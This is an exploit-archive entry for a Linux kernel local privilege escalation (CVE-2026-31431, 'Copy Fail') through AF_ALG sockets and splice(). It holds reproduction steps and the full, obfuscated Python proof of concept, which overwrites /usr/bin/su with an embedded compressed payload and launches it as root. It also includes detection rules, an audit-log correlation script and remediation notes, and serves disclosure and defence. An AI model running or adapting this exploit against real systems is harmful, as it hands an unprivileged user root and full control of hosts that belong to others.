Copy Fail Linux Kernel Local Privilege Escalation (CVE-2026-31431)

by Xint Code (Theori), Juno Im · 2026-05-17

Severity:          High
CVE:               CVE-2026-31431
Category:          binary
Affected product:  Linux kernel (crypto / AF_ALG AEAD path)
Affected versions: Confirmed on Ubuntu 24.04 (6.17.0-1007-aws), Amazon Linux 2023 (6.18.8-9.213.amzn2023), RHEL 10.1 (6.12.0-124.45.1.el10_1), SUSE 16 (6.12.0-160000.9-default)
Disclosed:         2026-05-17
Patch status:      unpatched

Metadata

Date Added:          2026-05-17
Last Updated:        2026-04-29
Author / Researcher: Xint Code (Theori), Juno Im
CVE / Advisory:      CVE-2026-31431
Category:            binary
Severity:            High
CVSS Score:          N/A
Status:              Weaponized
Tags:                LPE, Linux kernel, AF_ALG, authenc, splice, local, Python
Related:             N/A

Affected Target

Software / System:       Linux kernel (crypto / AF_ALG AEAD path)
Versions Affected:       Confirmed on Ubuntu 24.04 (6.17.0-1007-aws), Amazon Linux 2023 (6.18.8-9.213.amzn2023), RHEL 10.1 (6.12.0-124.45.1.el10_1), SUSE 16 (6.12.0-160000.9-default)
Language / Platform:     Python, Linux
Authentication Required: Yes (local unprivileged shell)
Network Access Required: Local only

Summary

Copy Fail (CVE-2026-31431) is a Linux kernel local privilege-escalation vulnerability published by Theori (Xint Code). The provided PoC abuses AF_ALG AEAD socket operations with crafted parameters and splice() writes to patch privileged executable bytes and obtain root execution. Public exploit code is available and demonstrates practical exploitation against multiple major Linux distributions.


Vulnerability Details

Root Cause

The exploit points to an unsafe kernel handling path in AEAD/authenc processing that is reachable through AF_ALG sockets. Crafted socket options and message metadata allow attacker-controlled writes during crypto processing, which lets an unprivileged context corrupt privileged executable data.

Attack Vector

An attacker with local shell access runs the Python PoC. The script opens /usr/bin/su, creates an AF_ALG socket configured for authenc(hmac(sha256),cbc(aes)), repeatedly issues crafted sendmsg + splice operations, and then executes su to obtain elevated privileges.

Impact

Successful exploitation yields local privilege escalation to root on affected kernels. This allows full host compromise, including arbitrary command execution, persistence, and security control bypass.


Environment / Lab Setup

OS:           Ubuntu 24.04 LTS / Amazon Linux 2023 / RHEL 10.1 / SUSE 16
Target:       Linux kernel versions listed in Tested Distro / Version
Attacker:     Local unprivileged user on target host
Tools:        python3

Setup Steps

git clone https://github.com/theori-io/copy-fail-CVE-2026-31431
cd copy-fail-CVE-2026-31431
python3 copy_fail_exp.py

Proof of Concept

Step-by-Step Reproduction

  1. Prepare local lab host: use a test kernel/distribution listed by upstream research.

     uname -a

  2. Run exploit code as local user

     python3 copy_fail_exp.py

  3. Confirm privilege escalation

     id
     whoami

Exploit Code

See copy_fail_exp.py in this folder (full listing below). The file begins:

#!/usr/bin/env python3
import os as g,zlib,socket as s

Expected Output

uid=0(root) gid=0(root) groups=0(root)
root

Screenshots / Evidence

  • No screenshots bundled in upstream repo.

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert audit any any -> any any (msg:"Possible Copy Fail local exploit behavior"; content:"AF_ALG"; content:"splice"; sid:900031431;)
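The rule above keys on string content, which an audit log of the PoC's behaviour does not carry in that form. A more reliable host-side signal is the syscall sequence itself: the script creates a socket with family AF_ALG (38) and then issues repeated splice() calls from the same unprivileged process. The following Python script is an added example, not part of the upstream repository or the archive entry: it parses Linux audit SYSCALL records and flags any pid that opens an AF_ALG socket and is then seen splicing. The sample records, the process names in them and the function names (parse_record, find_af_alg_splice_chains) are constructed for this illustration; the syscall numbers are the x86_64 values and differ on other architectures.

```python
#!/usr/bin/env python3
"""Correlate audit SYSCALL records: AF_ALG socket() followed by splice() in one pid."""
import re

# x86_64 syscall numbers; audit records carry the raw number, not the name.
SYS_SOCKET = 41
SYS_SPLICE = 275
AF_ALG = 38  # socket() family argument; audit prints a0 in hex, so it appears as a0=26

# Constructed sample audit records (not captured from any real host).
# pid 3456 mirrors the PoC's shape: one AF_ALG socket(), then repeated splice() calls.
# pid 4100 is an ordinary AF_INET socket; pid 4200 opens AF_ALG but never splices,
# which is what a legitimate kernel-crypto consumer typically looks like.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1778900001.101:201): arch=c000003e syscall=41 success=yes exit=3 a0=26 a1=5 a2=0 a3=0 ppid=2200 pid=3456 auid=1000 uid=1000 comm="python3" exe="/usr/bin/python3.12" key="af_alg"
type=SYSCALL msg=audit(1778900001.150:202): arch=c000003e syscall=275 success=yes exit=4 a0=3 a1=7 a2=7ffd00c0 a3=4 ppid=2200 pid=3456 auid=1000 uid=1000 comm="python3" exe="/usr/bin/python3.12" key="splice"
type=SYSCALL msg=audit(1778900001.151:203): arch=c000003e syscall=275 success=yes exit=4 a0=6 a1=5 a2=0 a3=4 ppid=2200 pid=3456 auid=1000 uid=1000 comm="python3" exe="/usr/bin/python3.12" key="splice"
type=SYSCALL msg=audit(1778900001.160:204): arch=c000003e syscall=275 success=yes exit=4 a0=3 a1=7 a2=7ffd00c0 a3=4 ppid=2200 pid=3456 auid=1000 uid=1000 comm="python3" exe="/usr/bin/python3.12" key="splice"
type=SYSCALL msg=audit(1778900002.000:205): arch=c000003e syscall=41 success=yes exit=3 a0=2 a1=1 a2=6 a3=0 ppid=2200 pid=4100 auid=1000 uid=1000 comm="curl" exe="/usr/bin/curl" key="socket"
type=SYSCALL msg=audit(1778900003.000:206): arch=c000003e syscall=41 success=yes exit=3 a0=26 a1=5 a2=0 a3=0 ppid=1 pid=4200 auid=4294967295 uid=0 comm="kcrypto-user" exe="/usr/sbin/kcrypto-user" key="af_alg"
"""

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
_TS = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")


def parse_record(line):
    """Turn one audit SYSCALL line into a dict of its key=value fields (quotes stripped).
    Non-SYSCALL record types return None so callers can skip them."""
    if not line.startswith("type=SYSCALL"):
        return None
    rec = {k: v.strip('"') for k, v in _KV.findall(line)}
    m = _TS.search(line)
    if m:
        rec["ts"] = float(m.group(1))
    return rec


def find_af_alg_splice_chains(log_text, min_splices=2):
    """Return one finding per pid that created an AF_ALG socket and afterwards issued
    at least min_splices successful splice() calls. splice() calls that precede the
    AF_ALG socket() are not counted, so an unrelated earlier splice does not alert."""
    state = {}  # pid -> {"af_alg_at", "splices", "comm", "uid"}
    for line in log_text.splitlines():
        rec = parse_record(line)
        if not rec or rec.get("success") != "yes":
            continue
        pid = rec.get("pid")
        nr = int(rec.get("syscall", -1))
        if nr == SYS_SOCKET and int(rec.get("a0", "0"), 16) == AF_ALG:
            # Remember the first AF_ALG socket per pid; later ones do not reset the count.
            state.setdefault(pid, {"af_alg_at": rec.get("ts"), "splices": 0,
                                   "comm": rec.get("comm"), "uid": rec.get("uid")})
        elif nr == SYS_SPLICE and pid in state:
            state[pid]["splices"] += 1
    findings = []
    for pid, st in state.items():
        if st["splices"] >= min_splices:
            findings.append({"pid": pid, "comm": st["comm"], "uid": st["uid"],
                             "af_alg_at": st["af_alg_at"], "splices": st["splices"]})
    return findings


if __name__ == "__main__":
    for f in find_af_alg_splice_chains(SAMPLE_AUDIT_LOG):
        print(f"pid {f['pid']} ({f['comm']}, uid {f['uid']}): AF_ALG socket at "
              f"{f['af_alg_at']} followed by {f['splices']} splice() calls")
```

To produce records of this shape, auditd needs rules that log socket() with a0 equal to 38 and splice(), for example `-a always,exit -F arch=b64 -S socket -F a0=38 -k af_alg` and `-a always,exit -F arch=b64 -S splice -k splice`. AF_ALG on its own is not an indicator, since userspace crypto consumers use it legitimately; the value of the correlation is the AF_ALG-then-splice sequence from a non-root uid, and the min_splices threshold should be tuned against a baseline of the host's normal splice users before alerting on it.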

Remediation

Patch:            Apply vendor-provided kernel fixes for CVE-2026-31431 as distribution updates become available
Workaround:       Restrict untrusted local shell access and harden execution controls (AppArmor/SELinux/seccomp where applicable)
Config Hardening: Monitor and limit abuse of AF_ALG and unusual local Python execution in production environments

Notes

Auto-ingested from https://github.com/theori-io/copy-fail-CVE-2026-31431 on 2026-05-17.

copy_fail_exp.py
#!/usr/bin/env python3
# DISCLAIMER: For authorized security research only.
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")